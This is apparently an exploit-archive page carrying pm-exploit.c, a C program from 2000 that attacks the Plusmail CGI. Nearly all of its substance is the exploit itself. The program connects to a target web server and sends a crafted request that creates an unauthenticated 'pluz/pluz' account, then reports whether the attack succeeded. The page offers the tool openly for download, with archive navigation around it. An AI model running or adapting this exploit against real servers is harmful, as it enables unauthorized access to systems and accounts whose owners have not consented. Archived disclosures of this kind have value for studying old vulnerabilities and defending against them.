exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

pm-exploit.c

pm-exploit.c
Posted Jul 28, 2000
Authored by Headflux | Site synnergy.net

Plusmail remote exploit - plusmail fails to check authenticity before creating new accounts.

tags | exploit, remote
SHA-256 | d135ccf5f8a6a9533ff037f70b405c3d3242fbe73307d53c2851b300624a774d

pm-exploit.c

Change Mirror Download
/*
* [Synnergy Networks http://www.synnergy.net]
*
* Title: plusbug.c - [remote plusmail exploit]
* Author: headflux (hf@synnergy.net)
* Date: 01.10.2000
* Description: plusmail fails to check authenticity before creating new
* accounts
*
* [Synnergy Networks (c) 2000, http://www.synnergy.net]
*/

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
char *expcgi = "GET /cgi-bin/plusmail?login=pluz&password=pluz&"
"password1=pluz&new_login=Login HTTP/1.0\n\n";

struct hostent *hp;
struct in_addr addr;
struct sockaddr_in s;
u_char buf[280];
int p, i;

if (argc < 1)
{
printf("usage: %s hostname\n", argv[0]);
exit(1);
}

hp = gethostbyname(argv[1]);
if(!hp)
{
printf("bad hostname.\n");
exit(1);
}

bcopy (hp->h_addr, &addr, sizeof (struct in_addr));
p = socket (s.sin_family = 2, 1, IPPROTO_TCP);
s.sin_port = htons(80);
s.sin_addr.s_addr = inet_addr (inet_ntoa (addr));

if(connect (p, &s, sizeof (s))!=0)
{
printf("error: unable to connect.\n");
return;
}
else
{
send(p, expcgi, strlen(expcgi), 0);
alarm(5);
read(p, buf, 255);
close(p);
}

if (strstr(buf, "200 OK") && ! strstr(buf, "Invalid"))
printf("account pluz/pluz created.\n");
else
printf("exploit failed.\n");

return(0);
}
/* www.hack.co.za [21 July]*/
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close